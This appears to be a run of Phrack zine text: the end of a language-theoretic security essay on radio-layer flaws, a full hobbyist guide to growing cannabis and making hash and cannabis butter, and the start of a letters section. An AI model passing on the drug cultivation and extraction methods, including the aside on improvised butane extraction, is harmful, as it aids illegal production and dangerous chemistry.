The key to understanding this design problem is the incorrect
assumptions about how input is handled, in particular, of how it is
handled as a language, and the machine that handles it.

The _language-theoretic approach_ to finding just such misconceptions
and exploitable bugs based on it was developed by Len Sassaman
and Meredith L. Patterson. Watch their talks [3,4] and look for
upcoming papers at http://langsec.org

Such a language-theoretic analysis at L1 would have revealed this
immediately. Valid frames are phrases in the language of bytes that a
digital radio continually pulls out of the air, and the L1 seen as an
automaton for accepting valid phrases (frames) should reject
everything else.

The start-of-frame-delimiter matching functionality within the radio
chip is just a shift register and a comparison circuit -- too simple
an automaton, in fact, to guarantee anything about the validity of the
frame. With this perspective, the misconception of L2 expecting frame
encapsulation and validity becomes clear, almost trivial. The key to
finding the vulnerability is in choosing this perspective.

Conversely, there is no nicer source of 0-day than false assumptions
about what is on the other side of an interface boundary of a
textbook-blessed design. The convenient fiction of classic
abstractions leads one to imagine a perfect and perfectly trustworthy
machine on the other side, which takes care of serving up only the
right kind of inputs to one's own layer. And so layers of abstraction
become boundaries of competence.

References:

[1] Travis Goodspeed, Sergey Bratus, Ricky Melgares, Rebecca Shapiro, 
    Ryan Speers, 
   "Packets in Packets: Orson Welles' In-Band Signaling Attacks for 
    Modern Radios", 
    USENIX WOOT, August 2011,
    http://www.usenix.org/events/woot11/tech/final_files/Goodspeed.pdf

[2] Travis Goodspeed,
    Remotely Exploiting the PHY Layer,
    http://travisgoodspeed.blogspot.com/2011/09/
      remotely-exploiting-phy-layer.html

[3] Len Sassaman, Meredith L. Patterson,
    "Exploiting the Forest with Trees",
    BlackHat USA, August 2010,
    http://www.youtube.com/watch?v=2qXmPTQ7HFM

[4] Len Sassaman, Meredith L. Patterson,
   "Towards a formal theory of computer insecurity: a language-theoretic 
    approach"
    Invited Lecture at Dartmouth College, March 2011,
    http://www.youtube.com/watch?v=AqZNebWoqnc


|=[ 0x07 ]=--=[ The 1130 Guide to Growing High-Quality Cannabis - 1130 ]-=|

So you wanna grow marijuana? You wanna get high off your own buds?  Well
this guide will surely teach you how. I'll assume you're already somewhat
familiar with Mary-Jane, so I won't explain all the jargon in deep detail.


Table of Contents

0x00: General Botany -- basic plant knowledge
0x01: Environment -- air, temperature, and humidity
0x02: Container -- size and shape
0x03: Water -- temperature and filtering
0x04: Nutes -- plant food
0x05: Conductivity and pH -- don't burn the roots
0x06: Hydroponics -- how-to hydro
0x07: Light -- which and why
0x08: Cloning -- make 'em root
0x09: Vegging -- big 'n' bushy
0x0A: Flowering -- dense and dank
0x0B: Harvest -- chop, dry, and cure
0x0C: Extracts -- smoke, vape, and cook
0x0D: Signs and Symptoms -- oh noes, wtf mang!



0x00: General Botany

If you've never grown before, growing cannabis can be difficult. Really
though, it just depends on how much time you put in. As long as you check
in on your plants 3-4 times a day, you'll begin to learn enough about them
to grow some really dank buds. But to get you started, here are a few
things you should know.

Plants need light, water, air, and food to grow. A lack of any one of these
at best will slow its growth and at worst will cause part or all of it to
die. Light is generally the most limiting factor in determining a plant's
growth rate, but that assumes all other factors are maxed. Plants absorb
water and nutrients through their roots and carbon dioxide (CO2) through
their leaves. They also need a bit of oxygen which they absorb through both
leaves and roots.

Chloryphyll is a chemical in their leaves that's used as a catylyst with
energy from light to convert CO2 and water into sugars and oxygen.
Chloryphyll-a is also what gives leaves their green color, while
Chloryphyll-b is responsible for the yellow color of leaves.

Plants need oxygen in order to burn energy to stay alive and grow, like we
do, but plants produce much more oxygen than they consume. Plants are not
able to move enough oxygen from the leaves down to the roots, so roots must
have access to some oxygen in order to stay alive. When soil dries, air
fills the space in the ground, and so soil must dry enough so that the
roots can have air to breathe.

Cannabis has two main kinds of roots. There are the taproots which can grow
very large and persist through dryness, and there are the feeder hairs.
Feeder hairs will not survive very long without water, but since the roots
need air to breathe the soil must dry out enough between waterings. Thus,
it is important to let soil dry enough so it is not wet but still retains
enough moisture to keep the feeder hairs alive. If they die, they must grow
back before the plant can begin absorbing more nutrients. An easy way to
tell if the soil is properly dry is if the color is still dark (not a
lighter brown as when the dirt is "bone-dry") but the soil does not stay
clumped together as it does when wet.

Plants require three macronutrients to survive: N-P-K, or Nitrogen
(Nitrates), Phosphorus (Phosphates), and Potassium (Potash). Nitrogen is
primarily responsible for the green color in vegetative matter. It is not
as important in fruits and flowers. Phosphorus is needed for root growth
and is also the primary nutrient for fruits and flowers. Potassium is used
throughout the plant to provde support; more Potassium means stronger,
stiffer stems and branches which provide better support for dense buds.


0x01: Environment

Although cannabis grows in pretty much any condition (it is a weed, after
all), optimal conditions produce optimal growth rates. Certain strains may
be more picky than others, but generally you want the following:

Humidity
 Cloning: 90-100%
 Vegging: 50-80%
 Flowering: 40-50%

Temperature should always be 68-75F (20-24C). Lower temps increase
humidity, and higher temps reduce humidity. Plants drink through their
leaves as well as their roots, and they need humidity to do this. They also
transpire through their leaves when temperatures are too high. Keep this in
mind when checking your levels and diagnosing your plants. For instance, if
the environment's been hotter than ideal and the air is dry, a small
watering in between regular waterings may be necessary to protect the roots
near the topsoil and prevent the plant from going into shock.

Air flow is very important. Basically you want to see the leaves moving at
all times. Proper air flow does two things: it moves the air right around
the leaves so the plant always has access to CO2, and the continuous leaf
movement causes the plant to react and grow stronger stems which you need
to support those massively dense buds you wanna grow. Too much airflow
isn't a big deal as long as the plants aren't falling over. Technically,
moving air will reduce air pressure and thus temperature will drop
slightly, so if heat is a problem for you consider keeping your fan on a
higher setting. But the more air flow, the more the plants transpire, and
the more water they'll need.


0x02: Container

Cannabis needs a proper container to provide optimal root growth. In shape,
the best container is wider than it is tall. If growing outdoors, a raised
bed of good soil does wonders. Indoors, wide pots or trays work very well.
You'll need to decide if you want to grow in soil or a hydroponic medium.
There are pros and cons to both. Soil with compost is ideal for outdoor
organic growing -- after preparation nature helps keep the roots healthy,
and with a good compost mix most of the time plain water is all that's
needed. If growing in pots, soil is still a good choice, but you will
definitely have to supplement the water with additional nutrients, or you
can use dry fertilizers that you work into the topsoil.

Indoor growing is much different than outdoor, and growing hydroponically
adds a-whole-nother set of variables. If you're lazy, you have two options:
grow in soil (soil is very forgiving), or build an automated setup. An
automated setup is one that takes care of watering for you, so all you need
to do is regular checkups, trimming, and checking on your reservoir.  I'll
go into detail about different hydroponic setups later on.


0x03: Water

Yes, a whole section on water, albeit a short one. Water temperature should
be a little less than air temperature, although the roots will tolerate
pretty cold water. Never give your plants water that's less than 50F (10C);
you'll risk shocking the roots and stunting growth for a few days.

Water should be clean of excess salts, especially chlorine and chloramines.
Soil gardens will tolerate the chlorines much better than hydro, but you
should really get a water filter. A carbon filter is usually fine, but if
your water source is really bad you might want to consider Reverse-Osmosis.
RO filters are expensive, but they also reduce the conductivity of the
water to the lowest possible levels, allowing you to add more nutrients
without burning the roots. Carbon filters are pretty cheap, and you could
even use a regular drinking water filter.


0x04: Nutes

I do love organic; there's nothing quite like the taste of organically
grown buds, but I do find that synthetic nutrients give amazing results.
If you're not growing for personal use, synthetics are cheaper and can give
very high yields. Either way, I'd recommend using a premade blend made by a
name-brand company -- when you're starting out it's just not worth trying
to play chemist, just get the kit. I use liquid nutrients for both hydro
and soil, but dry feeds will work in soil and any non-recirculating hydro
setup (e.g. feed and drain in coco). Liquid nutrients are designed to be
instantly accessible by the plants, whereas dry feeds are usually
time-release.

Here are some rough empirical NPKs:
Cloning: 1-3-4
Vegging: 3-2-4
Flowering: 1-4-5

Aside from Nitrogen, Phosphates, and Potash, plants also need
micronutrients. Iron, Calcium, and Magnesium and at the top, with still
many others required to proper growth. Most organic mixes will have these
even though they won't specify on the bottle, but if you're growing with
synthetics you will have to supplement. Molasses has Fe, Ca, and Mg, and
the sugar content helps both feed microbials and rinse out the growing
medium. Various Vitamin B-1 mixes will have most necessary micronutrients.
Cal-Mag supplements are good too, but be aware when using in conjunction
with molasses so you don't overfeed.

In general, I recommend starting with less than half of the listed usage on
the nutrient containers and then increasing as you see fit. It's a lot
easier to see that your plants' leaves are a lighter green than you would
want and then to increase the Veg mix than to use too much and burn your
plants and have to start all over. If growing in soil, try starting at a
quarter-strength and using it with every watering. Increase as necessary to
compensate for light color and plant size.


0x05: Conductivity and pH

Soil/medium pH and water pH are measured differently, but as long as you
regulate the water pH there's no reason to worry about the soil. If you can
afford it, I highly recommend getting a pH/Conductivity meter; some also
measure PPM (parts per million), though it's usually a conversion from
conductivity (measures in milliSiemens). I don't even pay attention to the
usage on the nutrient bottle anymore, but I fill my resevoir according to
the conductivity. I find it to be much more accurate than measuring the
volume of water in gallons and using measuring cups for nutrients.

Required pH will depend entirely on your medium. In pure hydro/aero setups,
this is 5.6-5.8 for veg and 5.8-6.0 for flowering. In coco coir, this is a
bit higher: 6.0-6.2 for veg and 6.2-6.5 for flowering. In soil, it really
depends on what's in the mix, but it usually ranges in 6.5-6.8 for veg and
6.8-7.0 for flowering. Cloning should be in between the values for veg and
flowering (5.8 for hydro, 6.2 for coco, and 6.8 for soil).

pH mostly affects the nutrients that are available for the roots to absorb.
The lower ranges increase nitrogen uptake, and the higher ranges increase
phosphates. Since nitrogen is more important for veg and phosphate for
flowering, this explains why the ranges are different for each phase. If pH
varies by a point or two, it's not a big deal, but too strong in either
direction can cause root-burn as well as deficiencies in both macro and
micronutrients.

Conductivity requirements depend on the age/size of the plant. I suggest
starting with these maximums and steadily increasing for larger containers
so long as no signs of problems occur: For soil/hydro: Cloning: 0.8/1.2 mS
Vegging: 1.6/2.0 mS (containers up to 2 gallons) Flowering: 2.4/3.0 mS
(containers up to 5 gallons)

In general, conductivity >3.0 mS can be dangerous, so above that range only
increase once/week and only 0.1-0.2 mS at a time.


0x06: Hydroponics

Hydro is awesome. Plants have the ability to grow continuously and at a
very rapid pace, but they need extra care, and problems with nutrients or
pH often occur so quickly that by the time you realize there's a problem
it's usually too late. For first-timers, I'd recommend coco coir. If you're
ambitious, consider building your own aeroponic system. In general, there
are two types of systems: recirculating, and drain-to-waste. I'll list each
medium and give some details about which system is appropriate. For
recirculating, you'll want to drain and change your reservoir at least once
a week in addition to topping it off regularly, whereas if using a
drain-to-waste system only topping off is necessary.

Coco coir:
Coco coir is a part of the coconut husk that by itself can take years to
break down, hence its designation as a hydroponic medium. It's commonly
used as bedding for worms. It's highly absorbent and expands to sometimes
five times its dry volume when wet. It also holds air very well. Coco coir
is nice because it's very difficult to over-water your plants with it since
it holds so much air, and the shrinking in between waterings adds
additional air to the medium.  Drain-to-waste is best for coco because bits
of the medium will also drain out, and you don't want these clogging up
your pump or lines. Depending on the size of the container and plants, coco
requires 1-3 feedings/day.

Rockwool:
Rockwool is woven fibers of rock made by Grodan. Rockwool is very
absorbent, and it's easy to see when it is drying up. Like coco, rockwool
is very porous and holds air very well. I prefer rockwool for cloning.  Ebb
and flow (flood and drain, recirculating) or drain-to-waste both work well
with rockwool. Fast growing plants may require up to 5-6 waterings/day
depending on the size of medium. Timers come in handy here. For ebb and
flow, flood for 10-15 minutes, then drain. For drain-to-waste, feed as
needed, allowing 5-10% of the water feed to drain, ensuring complete
saturation of the medium.

Hydroton, Perlite, or other Pebbles:
Hydroton is a manufactured expanded-clay medium. Perlite is a volcanic
glass/rock, also expanded, and very porous. Both are better than filling a
container with rocks/pebbles, although you could do that if you're really
trying to save money. Hydroton and perlite do hold some water, but they
drain very quickly and so should not be left without water for an extended
period of time.
Ebb and flow or continuous drip work well here. Drain-to-waste is very
inefficient since the medium doesn't hold water for very long, and so very
accurate timings would be needed to prevent excessive waste. If using a
continuous drip, consider aerating the reservoir with an air pump to ensure
roots have access to oxygen. For ebb and flow, flood at least 1-2 times per
hour with no more than 15 minutes of dry time.

Aeroponic
Aeroponic growing is sweet. There's little-to-no chance of overwatering or
underwatering (unless your pump breaks) as the roots always have access to
water, nutrients, and air. For this, you'll need to contruct a sprayer
assembly inside a reservoir. Rubbermaid containers are cheap and work well.
cut 2" holes in the lid (or whatever size gasket you have) and fill the
holes with cylindrical foam gaskets to hold the plants. Plant roots hang
down freely into the reservoir. Construct the sprayer assembly using PVC
piping and small 180- and 360-degree sprayers depending on placement.  The
assembly should be as short as possible but have at least 2-3 inches above
the pump and below the sprayers at the top. Use a submersible pump, and
fill the reservoir to above the pump but below the sprayers. You will need
an NFT (Nutrient Film Technique) style timer for the pump. These typically
operate on cycles of 1 minute on and 4 minutes off or 3 minutes on and 5
minutes off. I've seen cheap adjustable ones on Ebay. You can also make one
yourself with an arduino and a relay pretty easily. Just make sure that the
cycle allows for time in between sprayings to provide the roots access to
air. An air pump here also works well.

Deep Water Culture:
DWC is simple, easy, and efficient. It's basically an aeroponic system but
with a much deeper reservoir, allowing the roots to grow down into the
nutrient solution. A sprayer system similar to the aeroponic one described
above can be used, or a top-drip works as well. For a top-drip, fill a pot
with Hydroton or another medium, and set the pump to continuously pump feed
from the reservoir underneath to the pot on top. An aerator for the
nutrient solution is necessary here so that roots hanging down into the
solution have access to air.

Aquaponic:
When I first read about this I was blown away. Aquaponic combines hydro
with an aquarium. Basically, you have a large reservoir with a DWC setup,
but additionally you have fish living inside as well. The fish and plants
eat each other's waste (just like in nature!), and they both feed on fish
meal which is one of the most common organic plant foods. Guppies are
usually the best choice for fish since they're cheap and reproduce quickly,
although any freshwater fish will work.


0x07: Light

Light is arguably the most important factor in growing. Typically it is the
most limiting factor. There are many different types of lights, and each
has its own benefits. Halogen lights are most common in professional grows,
fluorescents are cheap and efficient, and LEDs are gaining popularity.
Here's some info on each:

Good ol' incandescents:
These provide light, they sure do, but they also provide heat. They're best
used as supplemental light when you need the added heat as well, otherwise
just go with a fluorescent.

Fluorescents:
Fluorescents come in many sizes, shapes, and spectrums. Spectrum is rated
by color temperature in Kelvins. A 6500K light is usually recommended as it
provides the closest spectrum to the Sun's white light. In general, the
higher the K, the better. Fluorescents are great for all phases of growth,
but they're best suited for clones, mothers, and vegetative plants when you
have an HPS available for flowering. Even so, they're always great to
consider as supplementals since they're so cheap and efficient.

Metal-Hallides:
MH Halogens are extremely effective for the vegetative phase. They work for
flowering as well, but are not as effective as HPS lights. A 400-watt MH
can cover a 3x3ft area, 600-watt covers 4x4', and 1000-watt covers 6x6'.
Of course, additional light is nice.

High-Pressure Sodium:
HPS lights are best for flowering. They have a spectrum more concentrated
in the red/yellow end which plants tend to absorb more during the autumn
season (when flowering). In every test I've ever seen, HPS lights
outperform all other lights in flowering production, watt for watt (or
lumen-equivalent in the case of LEDs and fluorescents). HPS lights also
generate a lot of heat, so keep that in consideration.

LEDs:
LED lights are extremely efficient, but they're also expensive. In the long
run, they're worth it, but they can take a few cycles to pay themselves
off. LEDs come in combinations of red and blue (more red for flowering),
and sometimes other colors are added as well. If space permits, I'd still
recommend using an HPS along with LEDs for flowering, but LEDs are great
for the vegetative phase.

With all lights, the inverse-square law applies, meaning if you cut the
distance from light to plant in half, you quadruple the light received, and
vice versa, if you double the distance you quarter the light received. Too
much light can be a bad thing. Plants that are too small or do not have
enough water/nutrients to use will not be able to use all the light that
hits them and their leaves will burn. Also, there are areas close to the
lights that are called hotspots. These are areas where reflected light is
concentrated, and plants in these spots are more likely to burn since the
light there is very intense. The rule-of-thumb is use your hand: if it's
too hot for you, it's too hot for the plants.


0x08: Cloning

Cloning is the process of taking cuttings from a "mother" and allowing
these cuttings to root into plants of their own. In addition to your mother
plant, you'll need a sharp pair of snips, a humidity dome, cloning medium,
filtered water, cloning gel/powder (optional), nutrients (optional but
recommended), and a light that will be on 24-hours/day (a single
fluorescent is sufficient). Here is a step-by-step process:

Prepare your mothers by giving them plain water (along with a flushing
solution if you like, a bit of molasses works well) at least a day before
cutting clones. This helps flush out excess Nitrogen so that the clones can
root more quickly.

Prepare the cloning solution.  This can be plain water, but I like to add a
mix of flowering nutrients (better than vegging nutrients for rooting,
nitrogen is bad for cloning) and kelp and algae extracts. Balance the pH of
the solution according to the medium you're using, and throoughly soak the
medium.  I use rockwool. Other alternatives are Groplugs, Coco, and soil.
Any growing medium can work, really.I also like to keep a pool of solution
in the bottom tray of the humidity dome to help keep the humidity high as
well as provide food for the plants once they root. You can even allow the
medium to soak for the first 3-4 days of cloning to help speed up root
growth, just be sure to drain it after that.

Cut the clones. I've cut both small and tall clones, and the small ones
work very well too. Leave at least 2" (about 5cm) of stem underneath the
highest leaves. You can trim leaves off to save space, if you want. This
allows you to pack more clones inside the dome. Otherwise, I like to leave
the leaves on (except for the bottom section that's inside the medium). You
can place the clone directly in the medium, or you can shave and split the
bottom. Splitting the bottom of the stem and shaving off the outer-layer of
the bottom of the stem increases the surface area of the cambium layer,
kind of like a stemcell layer. From here is where the roots grow. Exposing
more can increase the rooting time by a few days, but often you will get
much more vigorous root growth. I prefer this method.

Dip the stem tip in cloning gel/powder, if you're using it (I don't), then
plant the clones inside the medium, and cover the dome. If cutting many
clones, I like to keep the dome partially covered (for those already
planted) so they don't start wilting right away.

After they're all planted and the dome is covered, place the dome under a
light that will be on 24-hours/day. Clones need very little light to root,
so a single fluorescent is sufficient here, or just some ambient light that
will not be shut off.

Clones can take anywhere from 5-14 days to root depending on the factors
discussed above. I like to keep my clones rooting in the dome until their
root masses are about a foot long, though the plants will still be short.
This ensures the best chance of avoiding shock when transplanting as well
as fairly explosive growth within a couple days of transplanting.


0x09: Vegging

Once clones have rooted, the vegetative phase begins. Most strains require
at least 18 hours of light/day to prevent them from flowering, though some
make require more, up to 24 hours/day. This is the easiest phase to grow in
since the plants are vigorous and large enough to tolerate shock.

Transplant your clones into the medium of your choice, and begin feeding a
mild nutrient solution. For soil gardens, plain water can be used for the
first week. Increase the concentration of the nutrient solution over time
to accomodate the size of the plant. Consider transplanting to a larger
container after two weeks of continuous, vigorous growth.

Depending on your setup, you'll want a different target size of your veg
plants. A sea of green, for instance, requires many plants next to each
other so that they basically form a horizontal plane across their tops, but
if you're growing in a small closet with 2-3 plants then you'll probably
want them as big as they can fit.

There are different stress-techniques used to promote larger growth.
Topping is one of the most common. Topping entails cutting off the newest
growth of the highest node, generally without trimming much of the larger
leaf matter. Topping forces the plant's vascular system to merge at this
point, causing more growth nodes to be produced here at the top of the
plant. Topping is a preferred method because the top buds of each branch
are generally the largest, and more top nodes mean more top nugs.

Another technique used is bending. Bending entails taking the tallest
branch of the plant and bending it down and to the side, usually tying it
down with gardening wire or string. Bending exposes more of the lower nodes
to direct light, causing them to grow larger. It also allows more buds to
receive direct light, making it another preferred method by many growers.

Creasing and snapping branches are a form of "supercropping", and they
combine the benefits of topping and bending. The idea is to break the inner
part of a branch while keeping it attached to the plant. Lke topping, this
causes a merging of the vascular system, and this section of branch later
on will grow into a nice bulge. And like bending, the top nodes are pushed
outward to allow more light to hit nodes underneath. It is usually best to
bandage the plant after supercropping until it has completely healed since
this technique can cause a good deal of damage to the plant if left
unattended. It's usually best to delay flowering for a couple of weeks
after supercropping to allow the plant to fully heal and build support for
those super dank buds it'll be growing.


0x0A: Flowering

Once your plant has reached the desired size, it's time for flowering.
Unless you're growing an autoflowering variety, the flowering cycle is
typically triggered by a change in nighttime length, and most often a
12-hour day/12-hour night cycle is used. Some plants will grow considerably
during the flowering phase, especially the African Sativas, so keep this in
mind; you don't want to trim the plant once it's in full flower production
as this causes considerable stress and can cause the female to produce some
seeds.

For the first couple weeks of flowering, convert about half of your
nutrient solution from the veg mix to the flower mix. Convert more to
flowering as time passes. After 2-3 weeks, a pure flowering mix should be
used. Once the mass of pistils have formed, increase the nutrient
concentration. Large, dense buds will develop, and some leaves may yellow
and drop. Toward the end of the cycle, pistils will change color (often
from white to orange/brown), and from here on consider flushing with plain
water. Flushing leaches leftover fertilizer from inside the plant, giving
it a much smoother burn. Plants that are harvested without flushing
typically will have harsh smoke, even after curing.

At the end of the flowering phase, the crystals on the buds, pistils,
leaves, and stems will first turn milky-white. After this, they begin to
brown. This is when they are ready to pick. Picking later will bring out
more of the Indica characteristics (more CBD/CBN), whereas picking earlier
will bring out more of the Sativa characteristics (more THC). Picking too
early, however, (before crystals have become milky-white) produces weak
buds, and often will just give you a headache when smoked.

If after flushing the crystals do not appear to change color, feed them
once more, with a full, strong solution, then continue flushing.
Additional buds will likely grow, and they will be ready soon after.


0x0B: Harvest

Harvest the plants by cutting at the base, then hang them upside-down (I
dare you to try hanging them right-side up....good luck) in a dark room to
dry. A small amount of airflow is necessary, so keep a fan on low but not
pointed directly at the plants. After at least one day of full darkness,
you can begin trimming. Trim off all the largest leaf first, leaving the
smaller, hashy leaves for manicuring later. If this trim does not have
crystals/hash on it, discard it, otherwise save for extracts.

Manicuring is a bit of a longer process. You can go the quick route, and
just trim the ends of the leaves sticking out like so many lazy-ass growers
do, or you can properly manicure your buds, making them look better and
preventing you from smoking all that leaf matter. To manicure, use a pair
of floral trimmers to reach in and cut the leaves at the base of the stem.
This is uaully easier then holding the buds upside down since the leaves
are below the buds. It takes practice and patience to avoid clipping off
whole buds, but even if you do just save them along with the other
manicured buds. After the leaf is clipped off, remove excess stem.  If the
stems fold when you try to break them, the buds are not dry yet; place them
in a brown paper bag for further drying. Once they snap, place them in
glass jars for curing. Also, save all the trim from manicuring for making
extracts. You can place it in a ziploc bag and put it in the freezer until
you're ready to make extracts.

Check on the glass jars once a day. Open each jar, and take a whiff. You'll
notice over time how the smell changes. Check out the buds. Try snapping a
stem. If it folds, either put the buds back in a paper bag, or keep the jar
open a bit longer. For a quick, 2-week cure, keep jars open 15-60 minutes
per day depending on dryness. If buds are dry, don't leave the jar open too
long, but open it at least once a day to allow the air inside to exchange.

During the curing process, chemicals inside the buds break down, mainly
those that cause harsh smoke. The longer the cure, the smoother the smoke
is, but I can't say that anything longer than 8 weeks really makes a
difference. Once the buds smell like they have cured, try smoking it.
Continue the curing process until the smoke is smooth and clean.


0x0C: Extracts

Now here's the fun part. Personally, I like making kief, hash, and baked
goods. Butane extracts are also pretty easy. I won't go into detail on
those, but making a butane extractor with PVC and a lighter refill can is
simple, and there are plenty of guides available online.

If you want to make butter or oil for cooking, you can use kief or hash
you've already made and not worry about filtering, or you can use the trim
in its entirety. If using trim, fill a pot with the amount of butter or oil
you want to make. Add just enough water to the pot so that it won't splash
or boil over, but otherwise more water doesn't hurt. Mix it all together,
and add the trimmings. Simmer the mixture for a minimum of 2 hours and up
to 24 hours -- I definitely notice a difference between 2 and 24, but I
can't say where the threshold is in between. After it's done cooking,
transfer the mixture through a strainer into another pot or bowl, and place
this into the refrigerator. The oil or butter (along with the good stuff)
will rise to the top, and the water will sit at the bottom. Since THC and
the other chemicals are oil- but not water-soluble, none of it should be
lost in the water. If the oil hasn't solidified at all, placing it in the
freezer for a little while should do the trick (too long and the water will
freeze). Scoop out the oil or butter, and use for baking, or spread on
toast!

Making water hash is pretty easy. Get yourself a set of extract bags
(minimum 3) including at least either a 73-ish or 90-ish micron bag. In a
set of 3 the others should be around 25 microns and at least 180 microns.
Place each bag, smallest first, into a bucket, and fill the bucket with
ice-water. Add the trim, and mix for 15-20 minutes with a kitchen or paint
mixer. Let the mixture settle for about half an hour, then remove each bag
one at a time. The first will remove the trim, and others after will have
hash and/or contaminants, depending on how many bags you use. If the set
comes with a screen, use the screen to press the water out of each mass of
hash. Scrape the hash off and set aside to dry.

Even easier than water hash is what I like to call white-trash hash. What
comes out is really kief, but you can press the kief into hash if you want.
Procure a large container, like a storage bin for a shelf. One with fairly
high walls is good so it captures as much of the mess as possible. Take
your 73-micron bag, and put your trim inside. Fill the rest of the bag with
broken-up dry ice. Tie the bag off (hold it closed), and shake into the
container until all the glorious beauty falls out. You may want to split
into multiple sessions, the first being more pure and second-grade after
that, but I usually just shake until it looks like it's all out.  What you
end up with in the bag is a green, sloppy mush that you can go ahead and
discard. The bin, however, is now full of wonderful kief.  Smoke it now, or
save it for later. Press a chunk into hash between your palms, or put some
in a baggie in your shoe and walk on it until it turns into hash.


0x0D: Signs and Symptoms

I've saved the worst for last. Here are different signs and symptoms of
various problems you may encounter.

Perfect: The sign of perfection is perky plants, solid to deep-green
colored (but not too dark). Leaves point upward at a 40-60 degree angle and
toward the light. Daily growth is visible. Pistils are perky but not
crooked at the ends.

Over-watering: leaves will curl downward, with the middle section being the
highest, kind of like it's trying to be an umbrella. Wait as long as
possible before watering again, and make sure to provide at least a mild
nutrient solution especially if straight water was used at the previous
watering.

Under-watering: Can be similar to heat stress when it occurs frequently,
but otherwise the leaves will lose perkiness and wilt, lying beside the
stem and pointing downward. Pistils first show signs with crooked ends, and
soon after they shrivel and change color. Make sure to fully soak the
container after this occurs, the best way being a slow flow of water rather
than gushing out of a watering can.

Heat-stress: Leaves fold up and inward, especially at the edges. Fix by
moving the light further away or reducing the temperature. Supplement with
extra air flow and a small extra watering (straight water is usually best
for this to prevent nutrient burn when coupled with heat stress).

Nitrogen deficiency: Leaves yellow to light-green. Treat by increasing
concentration of veg mix.

Nitrogen toxicity: Leaves very dark green, later start burning. Treat by
reducing the concentration of veg mix.

Phosphorus toxicity: Leaves dark green (purple tint sometimes) and wilt,
curling downward. Treat by reducing the concentration of flowering mix.

Various toxicities, deficiencies, pH burn: Chlorosis (dying plant matter)
on various parts of leaves. Different styles signifiy different problems,
but overall consider what changes have been made recently. Check pH of
nutrient solution. Fix by flushing medium with a mild nutrient solution at
proper pH. Avoid using supplements, just use a basic nutrient mix for the
current phase. Treat a suspected deficiency with only a slight increase in
what you think is needed. More often than not micronutrient dificiencies
are only present when using synthetic nutrients and only when not using any
other supplements. Mild deficiencies are not likely to show visible
symptoms.

Bugs!  Many different bugs will want to eat your plants. Some of the most
annoying are aphids and spider mites. Insecticidal soap works well with
aphids, and neem oil works extremely well with spider mites. For aphids,
spray on site.  Most soaps take care of them well. Also consider removing
infected plant matter. For mites, spray thoroughly and afterward remove
leaves with noticeable spots since these 90%+ of the time have eggs. Neem
will kill the mites but not the eggs. Spray again 2-3 days later and again
a week after the first. Afterward, inspect daily and spray as needed.
Grasshoppers eat the leaves. Sorry Mr. Grasshopper, but you gotta die. Pick
them off and get rid of them however you choose.  Caterpillars eat
everything, especially the buds. Inspect dying bud matter for caterpillars,
and remove those found. Spray with a Bt solution -- it's a bacteria that
when eaten causes the caterpillars to stop eating.  These methods are all
organic (or available as organic). Use synthetic pesticides only in severe
cases, and only before buds begin forming. Both the insecticidal soap and
neem oil can be washed and rinsed off with regular soap at harvest if
necessary.

Mold!  Mold sucks. Bud mold is highly infective and destructive. Bud mold
is characterized by grey/black along the stem and spreads quickly. Remove
entire affected plants immediately. Place in quarantine until sure of the
diagnosis, then destroy any infected plants.  Powdery mildew is annoying
but treatable. It is easy to spot -- visible white spots with a powdery
look on top of leaves. Treat by spraying with a baking soda solution and
increasing air flow. Decrease humidity for up to a week after symptoms
disappear if possible.


0xFF - Fin

That concludes this guide. I hope you've enjoyed reading it, and I hope
you're now ready to grow some super ultra dank megabuds.


|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x05 of 0x13

|=-----------------------------------------------------------------------=|
|=------------------------=[  L O O P B A C K  ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[  Phrack Staff  ]=--------------------------=|
|=-----------------------------------------------------------------------=|


    Hi there!

The least we could say is that p67 caught the attention of a lot of people.
We got a very good feedback both IRL, on IRC and through the comments on 
the website. Good. As you will soon find out, we had quite a bunch of
(un)interesting mails this year which we would like to share obviously ;>
Before going further, a quote from the last loopback is necessary:

                                 ---
We humbly apologize to all guys we never answered to neither by mail nor
through this phile because we suck at filtering our spam (this could
_absolutely_ not be a laziness issue, right?)
                                 ---

That said, we have to thank all the people that (un)voluntarily sent their
contributions, whatever these were.

As you will see, a polemic started with the release of the last scene phile
as several people felt a bit disappointed (to say the least) by the 
description of the gr33k scene.

So let's explain a few things about the context of its writing:
    - The writing itself is small and oriented because the authors didn't
    have the time to do better.
    - We (the phrack staff) are the ones who asked them for such a phile
    and being in a hurry we couldn't give more than a couple of weeks to
    the authors. Clearly they *SAVED* our sorry ass and they did it for
    you, the community. Sincere apologies of the staff if this was not good
    enough.
    - (Greek) people may argue that the description was not accurate itself
    but as you can remember, it was written with the idea of being
    completed in this release:


            Volume 0x0e, Issue 0x43, Phile #0x10 of 0x10
                                 ---
In this brief article we will attempt to give an overview of the current 
state of the Greek computer underground scene. However, since the strictly
underground scene in Greece is very small, we will also include some
information about other active IT security related groups and forums. There
is a going to be a second part to this article at a future issue in which 
we will present in detail the past of the underground Greek scene in all 
its gory glory.                  ---

And they kept their promise with the help of some notorious big shots
of the greek hacking scene.

To the bunch of losers/masturbating monkeys who are still complaining:

                                 /"\
                                |\./|
                                |   |
                                |   |
                                |>~<|
                                |   |
                             /'\|   |/'\..
                         /~\|   |   |   | \
                        |   =[@]=   |   |  \
                        |   |   |   |   |   \
                        | ~   ~   ~   ~ |`   )
                        |                   /
                         \                 /
                          \               /
                           \    _____    /
                            |--//''`\--|
                            | (( +==)) |
                            |--\_|_//--|


Don't worry, we published your side of the story as well. And now is time 
for our little ... hem ... group therapy session ;-)


                                    -- The Phrack Staff

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x00 - Phrack .VS. the social networks ]=--------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

From: Unix Root <1161967623738704101@mail.orkut.com>
Subject: orkut - Unix Root wants you to join orkut!

Unix Root wants you to join orkut.

    [ Unix Root himself, seriously? ]

Join now!
http://www.orkut.co.in/Join.aspx?id=ZZZZZZZZZZZZZZ&mt=22

    [ id has been replaced to protect the innocent (us) ]


  * * *

What you can do on orkut:
  - CONNECT with friends and family using scraps and instant messaging
  - DISCOVER new people through friends of friends and communities
  - SHARE your videos, pictures, and passions all in one place

